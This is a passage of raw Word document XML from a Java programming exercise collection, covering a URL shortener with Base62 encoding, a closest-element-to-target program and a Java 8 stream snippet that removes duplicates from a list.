          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C3A68C"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keyToUrl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OrDefaul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ke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URL not found"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D91537"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30F95FA"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F97E19"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Base62 encoding (a-z, A-Z, 0-9)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49675C99"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encodeToBase62</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D58396B"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Builder</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> sb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Builder</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9F7D8F"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whi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um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DA0BFEC"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s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ppen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HAR_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harA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BASE</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEFACEE"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n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BASE</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CA0B63"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D23C881"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s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vers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String</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CFDA25"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0F0C31C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7A0B2C"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80B7684"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longUrl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https://docs.google.com/document/d/1g1CwT8dhCGgjh1LtXSaRBZ1ctREqkldD76lAU4KxPOo/edit"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACE967F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0270593C"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hortUrl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hortenUR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ongUrl</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1C1722"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hortened URL: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hortUrl</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB04001"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5794503C"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originalUrl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xpandUR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hortUrl</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD700F6"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Expanded URL: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originalUrl</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264CBE2D" w14:textId="77777777"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471FE51" w14:textId="3533AE76" w:rsidR="007816A5" w:rsidRPr="00CE4B9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5D8CB80B" w14:textId="77777777" w:rsidR="007816A5" w:rsidRPr="00CE4B95" w:rsidRDefault="007816A5" w:rsidP="007816A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BD6E457" w14:textId="6A7A93B0" w:rsidR="008240D3" w:rsidRPr="00CE4B95" w:rsidRDefault="008240D3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="360" w:name="_Toc196307840"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00041EC0" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Find element closest to given target</w:t>
      </w:r>
      <w:bookmarkEnd w:id="360"/>
    </w:p>
    <w:p w14:paraId="5A04732E" w14:textId="77777777" w:rsidR="00A46C5A" w:rsidRPr="00CE4B95" w:rsidRDefault="008240D3" w:rsidP="00A46C5A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00A46C5A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a java program to find element closest to given target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C39715" w14:textId="2C6D318E" w:rsidR="00A46C5A" w:rsidRPr="00CE4B95" w:rsidRDefault="00A46C5A" w:rsidP="00A46C5A">
      <w:pPr>
        <w:ind w:left="360"/>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t>Input - int arr[] = { 1, 2, 4, 5, 6, 6, 8, 9 };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2587E5A2" w14:textId="7412E5BB" w:rsidR="00A46C5A" w:rsidRPr="00CE4B95" w:rsidRDefault="00A46C5A" w:rsidP="00A46C5A">
      <w:pPr>
        <w:ind w:left="360"/>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t>int target = 11;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E02A66F" w14:textId="14042C46" w:rsidR="008240D3" w:rsidRPr="00CE4B95" w:rsidRDefault="00A46C5A" w:rsidP="00A46C5A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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t>Output - 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B7EAF1" w14:textId="292B41B2" w:rsidR="008240D3" w:rsidRPr="00CE4B95" w:rsidRDefault="008240D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1021814F" w14:textId="77777777" w:rsidR="00041EC0" w:rsidRPr="00CE4B95"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losestElementFind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06A6B85" w14:textId="77777777" w:rsidR="00041EC0" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DABB385" w14:textId="77777777" w:rsidR="00041EC0" w:rsidRPr="00CE4B95"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findCloses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targ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F12C5DC" w14:textId="77777777" w:rsidR="00041EC0" w:rsidRPr="00CE4B95"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closes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0E3D933E" w14:textId="77777777" w:rsidR="00041EC0" w:rsidRPr="00CE4B95"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minDiff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b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targe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6B4670FC" w14:textId="77777777" w:rsidR="00041EC0" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08696DFC" w14:textId="77777777" w:rsidR="00041EC0" w:rsidRPr="00CE4B95"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FAD0887" w14:textId="77777777" w:rsidR="00041EC0" w:rsidRPr="00CE4B95"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currentDiff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b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targe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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2D14C9" w14:textId="77777777" w:rsidR="00041EC0" w:rsidRPr="00CE4B95"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currentDiff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minDiff</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8833285" w14:textId="77777777" w:rsidR="00041EC0" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                minDiff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urrentDiff</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C35E771" w14:textId="77777777" w:rsidR="00041EC0" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                closes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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFCACB2" w14:textId="77777777" w:rsidR="00041EC0" w:rsidRPr="00CE4B95"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A7A0FEA" w14:textId="77777777" w:rsidR="00041EC0" w:rsidRPr="00CE4B95"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7C16963" w14:textId="77777777" w:rsidR="00041EC0" w:rsidRPr="00CE4B95"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closest</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F4CB96" w14:textId="77777777" w:rsidR="00041EC0" w:rsidRPr="00CE4B95"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733246A" w14:textId="77777777" w:rsidR="00041EC0" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6008D823" w14:textId="77777777" w:rsidR="00041EC0" w:rsidRPr="00CE4B95"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E58AA8E" w14:textId="77777777" w:rsidR="00041EC0" w:rsidRPr="00CE4B95"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4</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6</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6</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8</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9</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A93DC62" w14:textId="77777777" w:rsidR="00041EC0" w:rsidRPr="00CE4B95"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targe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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557A6A6D" w14:textId="77777777" w:rsidR="00041EC0" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5451B4BC" w14:textId="77777777" w:rsidR="00041EC0" w:rsidRPr="00CE4B95"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closes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indClose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target</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8F61AB" w14:textId="77777777" w:rsidR="00041EC0" w:rsidRPr="00CE4B95"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Closest element to targe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targe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is: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losest</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A2C100" w14:textId="77777777" w:rsidR="00041EC0" w:rsidRPr="00CE4B95"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F0F3F5F" w14:textId="38B2C67B" w:rsidR="00041EC0" w:rsidRPr="00CE4B95"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069E42D8" w14:textId="77777777" w:rsidR="00041EC0" w:rsidRPr="00CE4B95" w:rsidRDefault="00041EC0" w:rsidP="00041EC0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ED4C801" w14:textId="4BB2C111" w:rsidR="008240D3" w:rsidRPr="00CE4B95" w:rsidRDefault="008240D3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="361" w:name="_Toc196307841"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00273B42" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Remove duplicate element from list using java 8</w:t>
      </w:r>
      <w:bookmarkEnd w:id="361"/>
    </w:p>
    <w:p w14:paraId="14098810" w14:textId="32DDC3EA" w:rsidR="008240D3" w:rsidRPr="00CE4B95" w:rsidRDefault="008240D3" w:rsidP="00B507E5">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00B507E5" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>If I want to remove the duplicate values from ArrayList then how can we achieve it using java 8?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB57C0B" w14:textId="0F00AAC7" w:rsidR="008240D3" w:rsidRPr="00CE4B95" w:rsidRDefault="008240D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FDD6538" w14:textId="58E8E4CD" w:rsidR="00487896" w:rsidRPr="00CE4B95" w:rsidRDefault="004878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8946361"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Integer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> list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ArrayList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;&gt;(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Array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asList</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1</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10</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1</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2</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2</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3</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10</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3</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3</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4</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5</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5</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79487391" w14:textId="684923A2" w:rsidR="00487896" w:rsidRPr="00CE4B95" w:rsidRDefault="004878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8946361"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Integer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> newList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lis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stream</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distinc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collect</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Collector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toLis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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1516516D" w14:textId="7F7630ED" w:rsidR="008240D3" w:rsidRPr="00CE4B95" w:rsidRDefault="008240D3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="362" w:name="_Toc196307842"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Program – </w:t>
